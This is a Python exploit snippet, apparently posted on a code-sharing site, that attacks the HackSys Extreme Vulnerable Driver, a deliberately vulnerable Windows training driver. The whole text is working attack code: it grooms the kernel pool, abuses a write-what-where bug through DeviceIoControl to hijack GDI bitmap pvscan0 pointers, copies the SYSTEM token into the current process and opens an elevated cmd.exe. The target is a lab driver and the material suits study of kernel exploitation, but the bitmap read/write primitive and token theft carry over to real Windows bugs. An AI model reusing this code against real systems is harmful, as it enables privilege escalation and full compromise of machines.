HEVD_arbitraryoverwrite.py 文件源码-python代码片段

def trigger_arbitrary_overwrite():
    """ Main Logic """
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    global hManager, hWorker

    # Massaging heap for Manager Bitmap
    debug_print ("[>] Setting up Manager Bitmap:")
    debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
    dup_address = alloc_free_accelerator_tables()
    setup_manager_bitmap()
    hManager_pvscan0_offset = dup_address + 0x50
    debug_print ("\t[+] Manager Bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)

    # Massaging heap for Worker Bitmap
    debug_print ("\n[>] Setting up Worker Bitmap:")
    debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
    dup_address = alloc_free_accelerator_tables()
    setup_worker_bitmap()
    hWorker_pvscan0_offset = dup_address + 0x50
    debug_print ("\t[+] Worker Bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)

    # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
    write_where = hManager_pvscan0_offset
    write_what_ptr = c_void_p(hWorker_pvscan0_offset)   
    evil_input = struct.pack("<Q", addressof(write_what_ptr)) +  struct.pack("<Q", write_where)
    evil_input_ptr = id(evil_input) + 32
    evil_size  = len(evil_input)
    debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
    dwReturn = c_ulong()
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None) 

    # Get SYSTEM EPROCESS
    system_EPROCESS = get_PsISP_kernel_address()
    debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)

    # Get current EPROCESS
    current_EPROCESS = get_current_eprocess(system_EPROCESS)
    debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)

    system_token = c_ulonglong()
    debug_print ("\r\n[+] Reading System TOKEN")
    read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
    debug_print ("[+] Writing System TOKEN")
    write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token));

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"